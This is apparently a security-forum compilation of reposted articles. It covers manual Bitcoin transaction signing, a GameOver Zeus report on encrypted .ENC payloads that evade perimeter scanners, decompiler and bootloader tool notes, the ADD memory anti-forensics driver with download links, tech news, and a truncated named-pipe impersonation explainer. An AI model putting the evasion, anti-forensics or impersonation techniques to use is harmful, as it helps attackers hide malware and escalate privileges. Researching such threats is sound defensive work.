scriptPubKey - are more complex and will be discussed later. [TABLE=class: tx] [TR] [TD=colspan: 2]version[/TD] [TD]01 00 00 00[/TD] [/TR] [TR] [TD=colspan: 2]input count[/TD] [TD]01[/TD] [/TR] [TR] [TD]input[/TD] [TD=class: txindent]previous output hash (reversed)[/TD] [TD]48 4d 40 d4 5b 9e a0 d6 52 fc a8 25 8a b7 ca a4 25 41 eb 52 97 58 57 f9 6f b5 0c d7 32 c8 b4 81[/TD] [/TR] [TR] [TD=class: txindent]previous output index[/TD] [TD]00 00 00 00[/TD] [/TR] [TR] [TD=class: txindent]script length[/TD] [TD][/TD] [/TR] [TR] [TD=class: txindent]scriptSig[/TD] [TD]script containing signature[/TD] [/TR] [TR] [TD=class: txindent]sequence[/TD] [TD]ff ff ff ff[/TD] [/TR] [TR] [TD=colspan: 2]output count[/TD] [TD]01[/TD] [/TR] [TR] [TD]output[/TD] [TD=class: txindent]value[/TD] [TD]62 64 01 00 00 00 00 00[/TD] [/TR] [TR] [TD=class: txindent]script length[/TD] [TD][/TD] [/TR] [TR] [TD=class: txindent]scriptPubKey[/TD] [TD]script containing destination address[/TD] [/TR] [TR] [TD=colspan: 2]block lock time[/TD] [TD]00 00 00 00[/TD] [/TR] [/TABLE] Here's the code I used to generate this unsigned transaction. It's just a matter of packing the data into binary. Signing the transaction is the hard part, as you'll see next. How Bitcoin transactions are signed The following diagram gives a simplified view of how transactions are signed and linked together.[14] Consider the middle transaction, transferring bitcoins from address B to address C. The contents of the transaction (including the hash of the previous transaction) are hashed and signed with B's private key. In addition, B's public key is included in the transaction. By performing several steps, anyone can verify that the transaction is authorized by B. First, B's public key must correspond to B's address in the previous transaction, proving the public key is valid. (The address can easily be derived from the public key, as explained earlier.) Next, B's signature of the transaction can be verified using the B's public key in the transaction. These steps ensure that the transaction is valid and authorized by B. One unexpected part of Bitcoin is that B's public key isn't made public until it is used in a transaction. With this system, bitcoins are passed from address to address through a chain of transactions. Each step in the chain can be verified to ensure that bitcoins are being spent validly. Note that transactions can have multiple inputs and outputs in general, so the chain branches out into a tree. How Bitcoin transactions are chained together.[14] The Bitcoin scripting language You might expect that a Bitcoin transaction is signed simply by including the signature in the transaction, but the process is much more complicated. In fact, there is a small program inside each transaction that gets executed to decide if a transaction is valid. This program is written in Script, the stack-based Bitcoin scripting language. Complex redemption conditions can be expressed in this language. For instance, an escrow system can require two out of three specific users must sign the transaction to spend it. Or various types of contracts can be set up.[15] The Script language is surprisingly complex, with about 80 different opcodes. It includes arithmetic, bitwise operations, string operations, conditionals, and stack manipulation. The language also includes the necessary cryptographic operations (SHA-256, RIPEM, etc.) as primitives. In order to ensure that scripts terminate, the language does not contain any looping operations. (As a consequence, it is not Turing-complete.) In practice, however, only a few types of transactions are supported.[16] In order for a Bitcoin transaction to be valid, the two parts of the redemption script must run successfully. The script in the old transaction is called scriptPubKey and the script in the new transaction is called scriptSig. To verify a transaction, the scriptSig executed followed by the scriptPubKey. If the script completes successfully, the transaction is valid and the Bitcoin can be spent. Otherwise, the transaction is invalid. The point of this is that the scriptPubKey in the old transaction defines the conditions for spending the bitcoins. The scriptSig in the new transaction must provide the data to satisfy the conditions. In a standard transaction, the scriptSig pushes the signature (generated from the private key) to the stack, followed by the public key. Next, the scriptPubKey (from the source transaction) is executed to verify the public key and then verify the signature. As expressed in Script, the scriptSig is: PUSHDATA signature data and SIGHASH_ALL PUSHDATA public key data The scriptPubKey is: OP_DUP OP_HASH160 PUSHDATA Bitcoin address (public key hash) OP_EQUALVERIFY OP_CHECKSIG When this code executes, PUSHDATA first pushes the signature to the stack. The next PUSHDATA pushes the public key to the stack. Next, OP_DUP duplicates the public key on the stack. OP_HASH160 computes the 160-bit hash of the public key. PUSHDATA pushes the required Bitcoin address. Then OP_EQUALVERIFY verifies the top two stack values are equal - that the public key hash from the new transaction matches the address in the old address. This proves that the public key is valid. Next, OP_CHECKSIG checks that the signature of the transaction matches the public key and signature on the stack. This proves that the signature is valid. Signing the transaction I found signing the transaction to be the hardest part of using Bitcoin manually, with a process that is surprisingly difficult and error-prone. The basic idea is to use the ECDSA elliptic curve algorithm and the private key to generate a digital signature of the transaction, but the details are tricky. The signing process has been described through a 19-step process (more info). Click the thumbnail below for a detailed diagram of the process. The biggest complication is the signature appears in the middle of the transaction, which raises the question of how to sign the transaction before you have the signature. To avoid this problem, the scriptPubKey script is copied from the source transaction into the spending transaction (i.e. the transaction that is being signed) before computing the signature. Then the signature is turned into code in the Script language, creating the scriptSig script that is embedded in the transaction. It appears that using the previous transaction's scriptPubKey during signing is for historical reasons rather than any logical reason.[17] For transactions with multiple inputs, signing is even more complicated since each input requires a separate signature, but I won't go into the details. One step that tripped me up is the hash type. Before signing, the transaction has a hash type constant temporarily appended. For a regular transaction, this is SIGHASH_ALL (0x00000001). After signing, this hash type is removed from the end of the transaction and appended to the scriptSig. Another annoying thing about the Bitcoin protocol is that the signature and public key are both 512-bit elliptic curve values, but they are represented in totally different ways: the signature is encoded with DER encoding but the public key is represented as plain bytes. In addition, both values have an extra byte, but positioned inconsistently: SIGHASH_ALL is put after the signature, and type 04 is put before the public key. Debugging the signature was made more difficult because the ECDSA algorithm uses a random number.[18] Thus, the signature is different every time you compute it, so it can't be compared with a known-good signature. With these complications it took me a long time to get the signature to work. Eventually, though, I got all the bugs out of my signing code and succesfully signed a transaction. Here's the code snippet I used. The final scriptSig contains the signature along with the public key for the source address (1MMMMSUb1piy2ufrSguNUdFmAcvqrQF8M5). This proves I am allowed to spend these bitcoins, making the transaction valid. [TABLE=class: tx] [TR] [TD=colspan: 2]PUSHDATA 47[/TD] [TD]47[/TD] [/TR] [TR] [TD]signature (DER)[/TD] [TD]sequence[/TD] [TD]30[/TD] [/TR] [TR] [TD=class: txindent]length[/TD] [TD]44[/TD] [/TR] [TR] [TD=class: txindent]integer[/TD] [TD]02[/TD] [/TR] [TR] [TD=class: txindent2]length[/TD] [TD]20[/TD] [/TR] [TR] [TD=class: txindent2]X[/TD] [TD]2c b2 65 bf 10 70 7b f4 93 46 c3 51 5d d3 d1 6f c4 54 61 8c 58 ec 0a 0f f4 48 a6 76 c5 4f f7 13[/TD] [/TR] [TR] [TD=class: txindent]integer[/TD] [TD]02[/TD] [/TR] [TR] [TD=class: txindent2]length[/TD] [TD]20[/TD] [/TR] [TR] [TD=class: txindent2]Y[/TD] [TD] 6c 66 24 d7 62 a1 fc ef 46 18 28 4e ad 8f 08 67 8a c0 5b 13 c8 42 35 f1 65 4e 6a d1 68 23 3e 82[/TD] [/TR] [TR] [TD=class: txindent, colspan: 2]SIGHASH_ALL[/TD] [TD]01[/TD] [/TR] [TR] [TD=colspan: 2]PUSHDATA 41[/TD] [TD]41[/TD] [/TR] [TR] [TD]public key[/TD] [TD]type[/TD] [TD]04[/TD] [/TR] [TR] [TD]X[/TD] [TD]14 e3 01 b2 32 8f 17 44 2c 0b 83 10 d7 87 bf 3d 8a 40 4c fb d0 70 4f 13 5b 6a d4 b2 d3 ee 75 13[/TD] [/TR] [TR] [TD]Y[/TD] [TD] 10 f9 81 92 6e 53 a6 e8 c3 9b d7 d3 fe fd 57 6c 54 3c ce 49 3c ba c0 63 88 f2 65 1d 1a ac bf cd[/TD] [/TR] [/TABLE] The final scriptPubKey contains the script that must succeed to spend the bitcoins. Note that this script is executed at some arbitrary time in the future when the bitcoins are spent. It contains the destination address (1KKKK6N21XKo48zWKuQKXdvSsCf95ibHFa) expressed in hex, not Base58Check. The effect is that only the owner of the private key for this address can spend the bitcoins, so that address is in effect the owner. [TABLE=class: tx] [TR] [TD]OP_DUP[/TD] [TD]76[/TD] [/TR] [TR] [TD]OP_HASH160[/TD] [TD]a9[/TD] [/TR] [TR] [TD]PUSHDATA 14[/TD] [TD]14[/TD] [/TR] [TR] [TD=class: txindent]public key hash[/TD] [TD]c8 e9 09 96 c7 c6 08 0e e0 62 84 60 0c 68 4e d9 04 d1 4c 5c[/TD] [/TR] [TR] [TD]OP_EQUALVERIFY[/TD] [TD]88[/TD] [/TR] [TR] [TD]OP_CHECKSIG[/TD] [TD]ac[/TD] [/TR] [/TABLE] The final transaction Once all the necessary methods are in place, the final transaction can be assembled. The final transaction is shown below. This combines the scriptSig and scriptPubKey above with the unsigned transaction described earlier. [TABLE=class: tx] [TR] [TD=colspan: 2]version[/TD] [TD]01 00 00 00[/TD] [/TR] [TR] [TD=colspan: 2]input count[/TD] [TD]01[/TD] [/TR] [TR] [TD]input[/TD] [TD=class: txindent]previous output hash (reversed)[/TD] [TD]48 4d 40 d4 5b 9e a0 d6 52 fc a8 25 8a b7 ca a4 25 41 eb 52 97 58 57 f9 6f b5 0c d7 32 c8 b4 81[/TD] [/TR] [TR] [TD=class: txindent]previous output index[/TD] [TD]00 00 00 00[/TD] [/TR] [TR] [TD=class: txindent]script length[/TD] [TD]8a[/TD] [/TR] [TR] [TD=class: txindent]scriptSig[/TD] [TD]47 30 44 02 20 2c b2 65 bf 10 70 7b f4 93 46 c3 51 5d d3 d1 6f c4 54 61 8c 58 ec 0a 0f f4 48 a6 76 c5 4f f7 13 02 20 6c 66 24 d7 62 a1 fc ef 46 18 28 4e ad 8f 08 67 8a c0 5b 13 c8 42 35 f1 65 4e 6a d1 68 23 3e 82 01 41 04 14 e3 01 b2 32 8f 17 44 2c 0b 83 10 d7 87 bf 3d 8a 40 4c fb d0 70 4f 13 5b 6a d4 b2 d3 ee 75 13 10 f9 81 92 6e 53 a6 e8 c3 9b d7 d3 fe fd 57 6c 54 3c ce 49 3c ba c0 63 88 f2 65 1d 1a ac bf cd[/TD] [/TR] [TR] [TD=class: txindent]sequence[/TD] [TD]ff ff ff ff[/TD] [/TR] [TR] [TD=colspan: 2]output count[/TD] [TD]01[/TD] [/TR] [TR] [TD]output[/TD] [TD=class: txindent]value[/TD] [TD]62 64 01 00 00 00 00 00[/TD] [/TR] [TR] [TD=class: txindent]script length[/TD] [TD]19[/TD] [/TR] [TR] [TD=class: txindent]scriptPubKey[/TD] [TD]76 a9 14 c8 e9 09 96 c7 c6 08 0e e0 62 84 60 0c 68 4e d9 04 d1 4c 5c 88 ac[/TD] [/TR] [TR] [TD=colspan: 2]block lock time[/TD] [TD]00 00 00 00[/TD] [/TR] [/TABLE] A tangent: understanding elliptic curves Bitcoin uses elliptic curves as part of the signing algorithm. I had heard about elliptic curves before in the context of solving Fermat's Last Theorem, so I was curious about what they are. The mathematics of elliptic curves is interesting, so I'll take a detour and give a quick overview. The name elliptic curve is confusing: elliptic curves are not ellipses, do not look anything like ellipses, and they have very little to do with ellipses. An elliptic curve is a curve satisfying the fairly simple equation y^2 = x^3 + ax + b. Bitcoin uses a specific elliptic curve called secp256k1 with the simple equation y^2=x^3+7. [25] Elliptic curve formula used by Bitcoin. An important property of elliptic curves is that you can define addition of points on the curve with a simple rule: if you draw a straight line through the curve and it hits three points A, B, and C, then addition is defined by A+B+C=0. Due to the special nature of elliptic curves, addition defined in this way works "normally" and forms a group. With addition defined, you can define integer multiplication: e.g. 4A = A+A+A+A. What makes elliptic curves useful cryptographically is that it's fast to do integer multiplication, but division basically requires brute force. For example, you can compute a product such as 12345678*A = Q really quickly (by computing powers of 2), but if you only know A and Q solving n*A = Q is hard. In elliptic curve cryptography, the secret number 12345678 would be the private key and the point Q on the curve would be the public key. In cryptography, instead of using real-valued points on the curve, the coordinates are integers modulo a prime.[19] One of the surprising properties of elliptic curves is the math works pretty much the same whether you use real numbers or modulo arithmetic. Because of this, Bitcoin's elliptic curve doesn't look like the picture above, but is a random-looking mess of 256-bit points (imagine a big gray square of points). The Elliptic Curve Digital Signature Algorithm (ECDSA) takes a message hash, and then does some straightforward elliptic curve arithmetic using the message, the private key, and a random number[18] to generate a new point on the curve that gives a signature. Anyone who has the public key, the message, and the signature can do some simple elliptic curve arithmetic to verify that the signature is valid. Thus, only the person with the private key can sign a message, but anyone with the public key can verify the message. For more on elliptic curves, see the references[20]. Sending my transaction into the peer-to-peer network Leaving elliptic curves behind, at this point I've created a transaction and signed it. The next step is to send it into the peer-to-peer network, where it will be picked up by miners and incorporated into a block. How to find peers The first step in using the peer-to-peer network is finding a peer. The list of peers changes every few seconds, whenever someone runs a client. Once a node is connected to a peer node, they share new peers by exchanging addr messages whenever a new peer is discovered. Thus, new peers rapidly spread through the system. There's a chicken-and-egg problem, though, of how to find the first peer. Bitcoin clients solve this problem with several methods. Several reliable peers are registered in DNS under the name bitseed.xf2.org. By doing a nslookup, a client gets the IP addresses of these peers, and hopefully one of them will work. If that doesn't work, a seed list of peers is hardcoded into the client. [26] nslookup can be used to find Bitcoin peers. Peers enter and leave the network when ordinary users start and stop Bitcoin clients, so there is a lot of turnover in clients. The clients I use are unlikely to be operational right now, so you'll need to find new peers if you want to do experiments. You may need to try a bunch to find one that works. Talking to peers Once I had the address of a working peer, the next step was to send my transaction into the peer-to-peer network.[8] Using the peer-to-peer protocol is pretty straightforward. I opened a TCP connection to an arbitrary peer on port 8333, started sending messages, and received messages in turn. The Bitcoin peer-to-peer protocol is pretty forgiving; peers would keep communicating even if I totally messed up requests. The protocol consists of about 24 different message types. Each message is a fairly straightforward binary blob containing an ASCII command name and a binary payload appropriate to the command. The protocol is well-documented on the Bitcoin wiki. The first step when connecting to a peer is to establish the connection by exchanging version messages. First I send a version message with my protocol version number[21], address, and a few other things. The peer sends its version message back. After this, nodes are supposed to acknowledge the version message with a verack message. (As I mentioned, the protocol is forgiving - everything works fine even if I skip the verack.) Generating the version message isn't totally trivial since it has a bunch of fields, but it can be created with a few lines of Python. makeMessage below builds an arbitrary peer-to-peer message from the magic number, command name, and payload. getVersionMessage creates the payload for a version message by packing together the various fields. Sending a transaction: tx I sent the transaction into the peer-to-peer network with the stripped-down Python script below. The script sends a version message, receives (and ignores) the peer's version and verack messages, and then sends the transaction as a tx message. The hex string is the transaction that I created earlier. The following screenshot shows how sending my transaction appears in the Wireshark network analysis program[22]. I wrote Python scripts to process Bitcoin network traffic, but to keep things simple I'll just use Wireshark here. The "tx" message type is visible in the ASCII dump, followed on the next line by the start of my transaction (01 00 ...). A transaction uploaded to Bitcoin, as seen in Wireshark. To monitor the progress of my transaction, I had a socket opened to another random peer. Five seconds after sending my transaction, the other peer sent me a tx message with the hash of the transaction I just sent. Thus, it took just a few seconds for my transaction to get passed around the peer-to-peer network, or at least part of it. Victory: my transaction is mined After sending my transaction into the peer-to-peer network, I needed to wait for it to be mined before I could claim victory. Ten minutes later my script received an inv message with a new block (see Wireshark trace below). Checking this block showed that it contained my transaction, proving my transaction worked. I could also verify the success of this transaction by looking in my Bitcoin wallet and by checking online. Thus, after a lot of effort, I had successfully created a transaction manually and had it accepted by the system. (Needless to say, my first few transaction attempts weren't successful - my faulty transactions vanished into the network, never to be seen again.[8]) A new block in Bitcoin, as seen in Wireshark. My transaction was mined by the large GHash.IO mining pool, into block #279068 with hash 0000000000000001a27b1d6eb8c405410398ece796e742da3b3e35363c2219ee. (The hash is reversed in inv message above: ee19...) Note that the hash starts with a large number of zeros - finding such a literally one in a quintillion value is what makes mining so difficult. This particular block contains 462 transactions, of which my transaction is just one. For mining this block, the miners received the reward of 25 bitcoins, and total fees of 0.104 bitcoins, approximately $19,000 and $80 respectively. I paid a fee of 0.0001 bitcoins, approximately 8 cents or 10% of my transaction. The mining process is very interesting, but I'll leave that for a future article. Bitcoin mining normally uses special-purpose ASIC hardware, designed to compute hashes at high speed. Photo credit: Gastev, CC:by Conclusion Using the raw Bitcoin protocol turned out to be harder than I expected, but I learned a lot about bitcoins along the way, and I hope you did too. My full code is available on GitHub.[23] My code is purely for demonstration - if you actually want to use bitcoins through Python, use a real library[24] rather than my code. Notes and references [1] The original Bitcoin client is Bitcoin-qt. In case you're wondering why qt, the client uses the common Qt UI framework. Alternatively you can use wallet software that doesn't participate in the peer-to-peer network, such as Armory or MultiBit. Or you can use an online wallet such as Blockchain.info. [2] A couple good articles on Bitcoin are How it works and the very thorough How the Bitcoin protocol actually works. [3] The original Bitcoin paper is Bitcoin: A Peer-to-Peer Electronic Cash System written by the pseudonymous Satoshi Nakamoto in 2008. The true identity of Satoshi Nakamoto is unknown, although there are many theories. [4] You may have noticed that sometimes Bitcoin is capitalized and sometimes not. It's not a problem with my shift key - the "official" style is to capitalize Bitcoin when referring to the system, and lower-case bitcoins when referring to the currency units. [5] In case you're wondering how the popular MtGox Bitcoin exchange got its name, it was originally a trading card exchange called "Magic: The Gathering Online Exchange" and later took the acronym as its name. [6] For more information on what data is in the blockchain, see the very helpful article Bitcoin, litecoin, dogecoin: How to explore the block chain. [7] I'm not the only one who finds the Bitcoin transaction format inconvenient. For a rant on how messed up it is, see Criticisms of Bitcoin's raw txn format. [8] You can also generate transaction and send raw transactions into the Bitcoin network using the bitcoin-qt console. Type sendrawtransaction a1b2c3d4.... This has the advantage of providing information in the debug log if the transaction is rejected. If you just want to experiment with the Bitcoin network, this is much, much easier than my manual approach. [9] Apparently there's no solid reason to use RIPEM-160 hashing to create the address and SHA-256 hashing elsewhere, beyond a vague sense that using a different hash algorithm helps security. See discussion. Using one round of SHA-256 is subject to a length extension attack, which explains why double-hashing is used. [10] The Base58Check algorithm is documented on the Bitcoin wiki. It is similar to base 64 encoding, except it omits the O, 0, I, and l characters to avoid ambiguity in printed text. A 4-byte checksum guards against errors, since using an erroneous bitcoin address will cause the bitcoins to be lost forever. [11] Some boilerplate has been removed from the code snippets. For the full Python code, see GitHub. You will also need the ecdsa cryptography library. [12] You may wonder how I ended up with addresses with nonrandom prefixes such as 1MMMM. The answer is brute force - I ran the address generation script overnight and collected some good addresses. (These addresses made it much easier to recognize my transactions in my testing.) There are scripts and websites that will generate these "vanity" addresses for you. [13] For a summary of Bitcoin fees, see bitcoinfees.com. This recent Reddit discussion of fees is also interesting. [14] The original Bitcoin paper has a similar figure showing how transactions are chained together. I find it very confusing though, since it doesn't distinguish between the address and the public key. [15] For details on the different types of contracts that can be set up with Bitcoin, see Contracts. One interesting type is the 2-of-3 escrow transaction, where two out of three parties must sign the transaction to release the bitcoins. Bitrated is one site that provides these. [16] Although Bitcoin's Script language is very flexible, the Bitcoin network only permits a few standard transaction types and non-standard transactions are not propagated (details). Some miners will accept non-standard transactions directly, though. [17] There isn't a security benefit from copying the scriptPubKey into the spending transaction before signing since the hash of the original transaction is included in the spending transaction. For discussion, see Why TxPrev.PkScript is inserted into TxCopy during signature check? [18] The random number used in the elliptic curve signature algorithm is critical to the security of signing. Sony used a constant instead of a random number in the PlayStation 3, allowing the private key to be determined. In an incident related to Bitcoin, a weakness in the random number generator allowed bitcoins to be stolen from Android clients. [19] For Bitcoin, the coordinates on the elliptic curve are integers modulo the prime2^256 - 2^32 - 2^9 -2^8 - 2^7 - 2^6 -2^4 -1, which is very nearly 2^256. This is why the keys in Bitcoin are 256-bit keys. [20] For information on the historical connection between elliptic curves and ellipses (the equation turns up when integrating to compute the arc length of an ellipse) see the interesting article Why Ellipses Are Not Elliptic Curves, Adrian Rice and Ezra Brown, Mathematics Magazine, vol. 85, 2012, pp. 163-176. For more introductory information on elliptic curve cryptography, see ECC tutorial or A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography. For more on the mathematics of elliptic curves, see An Introduction to the Theory of Elliptic Curves by Joseph H. Silverman. Three Fermat trails to elliptic curves includes a discussion of how Fermat's Last Theorem was solved with elliptic curves. [21] There doesn't seem to be documentation on the different Bitcoin protocol versions other than the code. I'm using version 60002 somewhat arbitrarily. [22] The Wireshark network analysis software can dump out most types of Bitcoin packets, but only if you download a recent "beta release - I'm using version 1.11.2. [23] The full code for my examples is available on GitHub. [24] Several Bitcoin libraries in Python are bitcoin-python, pycoin, and python-bitcoinlib. [25] The elliptic curve plot was generated from the Sage mathematics package: var("x y") implicit_plot(y^2-x^3-7, (x,-10, 10), (y,-10, 10), figsize=3, title="y^2=x^3+7") [26] The hardcoded peer list in the Bitcoin client is in chainparams.cpp in the array pnseed. For more information on finding Bitcoin peers, see How Bitcoin clients find each other or Satoshi client node discovery. Tweet Posted by Ken Shirriff at 8:47 AM Sursa: Ken Shirriff's blog: Bitcoins the hard way: Using the raw Bitcoin protocol
-
GameOver Zeus now uses Encryption to bypass Perimeter Security The criminals behind the malware delivery system for GameOver Zeus have a new trick. Encrypting their EXE file so that as it passes through your firewall, webfilters, network intrusion detection systems and any other defenses you may have in place, it is doing so as a non-executable ".ENC" file. If you are in charge of network security for your Enterprise, you may want to check your logs to see how many .ENC files have been downloaded recently. Malcovery Security's malware analyst Brendan Griffin let me know about this new behavior on January 27, 2014, and has seen it consistently since that time. On February 1st, I reviewed the reports that Malcovery's team produced and decided that this was a trend we needed to share more broadly than just to the subscribers of our "Today's Top Threat" reports. Subscribers would have been alerted to each of these campaigns, often within minutes of the beginning of the campaign. We sent copies of all the malware below to dozens of security researchers and to law enforcement. We also made sure that we had uploaded all of these files to VirusTotal which is a great way to let "the industry" know about new malware. I am grateful to William MacArthur of GoDaddy, Brett Stone-Gross of Dell Secure Works, and Boldizsár Bencsáth from CrySys Lab in Hungary who were three researchers who jumped in to help look at this with us. Hopefully others will share insights as well, so this will be an on-going conversation. To review the process, Cutwail is a spamming botnet that since early fall 2013 has been primarily distributing UPATRE malware via Social Engineering. The spam message is designed to convince the recipient that it would be appropriate for them to open the attached .zip file. These .zip files contain a small .exe file whose primary job is to go out to the Internet and download larger more sophisticated malware that would never pass through spam filters without causing alarm, but because of the way our perimeter security works, are often allowed to be downloaded by a logged in user from their workstation. As our industry became better at detecting these downloads, the criminals have had a slightly more difficult time infecting people. With the change last week, the new detection rate for the Zeus downloads has consistently been ZERO of FIFTY at VirusTotal. (For example, here is the "Ring Central" .enc file from Friday on VirusTotal -- al3101.enc. Note the timestamp. That was a rescan MORE THAN TWENTY-FOUR HOURS AFTER INITIAL DISTRIBUTION, and it still says 0 of 50. Why? Well, because technically, it isn't malware. It doesn't actually execute! All Windows EXE files start with the bytes "MZ". These files start with "ZZP". They aren't executable, so how could they be malware? Except they are. In the new delivery model, the .zip file attached to the email has a NEW version of UPATRE that first downloads the .enc file from the Internet and then DECRYPTS the file, placing it in a new location with a new filename, and then causing it both to execute and to be scheduled to execute in the future. UPATRE campaigns that use Encryption to Bypass Security Here are the campaigns we saw this week, with the hashes and sizes for the .zip, the UPATRE .exe, the .enc file, and the decrypted GameOver Zeus .exe file that came from that file. For each campaign, you will see some information about the spam message, including the .zip file that was attached and its size and hash, and the .exe file that was unpacked from that .zip file. Then you will see a screenshot of the email message, followed by the URL that the Encrypted GameOver Zeus file was downloaded from, and some statistics about the file AFTER it was decrypted. ALL OF THESE SPAM CAMPAIGNS ARE RELATED TO EACH OTHER! They are all being distributed by the criminals behind the Cutwail malware delivery infrastructure. It is likely that many different criminals are paying to use this infrastructure. [TABLE] [TR] [TD]Campaign: 2014-01-27.ADP[/TD] [TD]Messages Seen: 2606[/TD] [TD]Subject: Invoice #(RND)[/TD] [/TR] [TR] [TD]From: ADP - Payroll Services[/TD] [TD]payroll.invoices@adp.com[/TD] [/TR] [TR] [TD]Invoice.zip[/TD] [TD]9767 bytes[/TD] [TD]b624601794380b2bee0769e09056769c[/TD] [/TR] [TR] [TD]Invoice.PDF.exe[/TD] [TD]18944 bytes[/TD] [TD]8d3bf40cfbcf03ed13f0a900726170b3 [/TD] [/TR] [TR] [/TR] [/TABLE] Sursa: CyberCrime & Doing Time: GameOver Zeus now uses Encryption to bypass Perimeter Security
-
[h=1]SmartDec[/h] Native code to C/C++ decompiler. [h=2]Standalone[/h] Supports x86 and x86-64 architectures. Reads ELF and PE file formats. Reconstructs functions, their names and arguments, local and global variables, expressions, integer, pointer and structural types, all types of control-flow structures, including switch. Has a nice graphical user interface with one-click navigation between assembler code and reconstructed program. The only decompiler that handles 64-bit code. [h=2]IDA Pro plug-in[/h] Enjoys all executable file formats supported by the disassembler. Benefits from IDA's signature search, parsers of debug information, and demanglers. Push-button decompilation of a chosen function or the whole program. Easy jumping between the disassembler and the decompiled code. Full GUI integration. Sursa: SmartDec | derevenets.com
-
Programmer for CC2538 backdoor UART bootloader [h=1]CC2538-prog[/h] CC2538-prog is a command line application to communicate with the CC2538 ROM bootloader. Copyright © 2014, Toby Jaffey <toby@1248.io> Permission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies. THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. [h=1]Instructions[/h] To use cc2538-prog, the chip must first be configured to enable the backdoor UART bootloader. The boards in the CC2538DK are preconfigured with the PER firmware which disable the backdoor UART bootloader. To enable it, we need to rewrite this flash. CC2538 Bootloader Backdoor - Texas Instruments Wiki The simplest way to do this is to flash the supplied file firmware/cc2538dk-contiki-demo.hex with the Windows Flash Programmer tool or Uniflash for Linux. To use the backdoor UART bootloader, your firmware must apply the change from the above link to startup_gcc.c (remove BOOTLOADER_BACKDOOR_DISABLE). This change is present in cc2538dk-contiki-demo.hex If successful, you should see a flashing LED. From now on, you may enable the bootloader at any time by removing the jumper on the SmartRF06 for RF2.6. Removing the jumper and pressing the EM RESET button will start the bootloader. Firmware may then be loaded with cc2538-prog. Once the firmware is loaded, the bootloader must be disabled before reset, by replacing the RF2.6 jumper. Sursa: https://github.com/1248/cc2538-prog
-
ADD is a physical memory anti-analysis tool designed to pollute memory with fake artifacts. This tool was first presented at Shmoocon 2014. Please note that this is a proof of concept tool. It forges OS objects in memory (poorly). It would be easy (very easy) to beat with better tool development. The tools would only need to provide better sanity checks of objects discovered during scanning. In that case, further development on ADD would be needed to beat new versions of forensics tools. The tool currently works only against Windows 7 SP1 x86. Huge portions of the driver code were based on the Windows DDK Sioctl driver code sample(because honestly, who wants to build device manager PnP code?). Haven't started source code versioning yet, just wanted to get the code out there so people can play with it. Started a Google code project for this before I remembered they restricted downloads on new projects (I guess all downloads are disabled now). FYI, there are places I don't do error checking where "real" programmers probably would. I'd like to point out that this is a PROOF OF CONCEPT tool. I don't think I'd run it on a target system without further testing and code auditing. Load the driver on a production system at your own risk. I haven't had any bugchecks with it yet, but YMMV. Driver: http://www.mediafire.com/download/v4jop3qois3gv4t/add-driver.zip User Agent: http://www.mediafire.com/download/see7o8rtnuwstp9/ADD_File.zip Reference Memory Image (with faked artifacts): http://www.mediafire.com/download/vvb0dbg2g2h1ukm/ADD-ref-image.zip Shmoocon Slides: ADD_Shmoocon Sursa: https://code.google.com/p/attention-deficit-disorder/
-
Facebook are juc?rii puternice – o nou? tehnologie de stocare la “rece” de doar 1 petabyte Publicat de Andrei Av?d?nei în Developers · ?tiri — 2 Feb, 2014 at 3:22 pm Facebook e probabil una din companiile ce de?ine cele mai multe informa?ii cu privire la, în general, tot ce înseamn? activitatea noastr? atât pe site-ul de socializare cat ?i pe site-urile conexe – cele care au un plugin al Facebook-ului, spre exemplu. Aceast? cantitate de informa?ie se afl? undeva foarte departe în profilele noastre ?i, de cele mai multe ori, sunt date de care re?eaua social? nu are nevoie prea des. Astfel c?, Facebook a încercat s? dezvolte tehnologii de tipul “stocare la rece” (cold storage), iar ultima realizare este un prototip ce se folose?te de stocarea datelor pe discuri Blu-ray. Jay Parikh, vice-pre?edinte la Facebook a explicat la Open Compute Summit cum acest prototip de cold storage ar putea ajuta re?eaua social? s? elibereze spa?iul vital de pe serverele lor. Pe scurt, noul sistem folose?te 10,000 de discuri Blu-Ray în acela?i timp pentru a stoca 1 petabyte de date. Articol complet: Facebook are juc?rii puternice – o nou? tehnologie de stocare la “rece” de doar 1 petabyte | WORLDIT
-
Arch Linux 2014.02.01 Is Now Available for Download February 2nd, 2014, 11:46 GMT · By Marius Nestor I can't believe that it's already February, and that another ISO image of the powerful Arch Linux distribution has been announced yesterday, as expected, on its official website. Unfortunately for some of you, Arch Linux is still not using the recently released Linux kernel 3.13. As such, Arch Linux 2014.02.01 is powered by Linux kernel 3.12.9, which is also the latest stable release of the upstream Linux 3.12 kernel series. Additionally, Arch Linux 2014.02.01 includes all the updated packages that were released during the past month, January 2014. As usual, existing Arch Linux users don’t need this new ISO image, as it's only intended for those of you who want to install Arch Linux on new machines. Arch Linux is a rolling-release Linux operating system, so in order to keep your Arch system up-to-date, use the sudo pacman -Syu or yaourt -Syua commands. Download Arch Linux 2014.02.01 right now from Softpedia. Follow @mariusnestor Sursa: Arch Linux 2014.02.01 Is Now Available for Download
-
[h=3]Namedpipe Impersonation Attack[/h] Privilege escalation through namedpipe impersonation attack was a real issue back in 2000 when a flaw in the service control manager allowed any user logged onto a machine to steal the identify of SYSTEM. We haven't heard a lot about this topic since then, is it still an issue? First of all, let's talk about the problem. When a process creates a namedpipe server, and a client connects to it, the server can impersonate the client. This is not really a problem, and is really useful when dealing with IPC. The problem arises when the client has more rights than the server. This scenario would create a privilege escalation. It turns out that it was pretty easy to accomplish. For example, let's assume that we have 3 processes: server.exe, client.exe and attacker.exe. Server.exe and client.exe have more privileges than attacker.exe. Client.exe communicates with server.exe using a namedpipe. If attacker.exe manages to create the pipe server before server.exe does, then, as soon as client.exe connects to the pipe, attacker.exe can impersonate it and the game is over. Fortunately, Microsoft implemented and recently documented some restrictions and tools to help you manage the risk. First of all there are some flags buried in the CreateFile documentation to give control 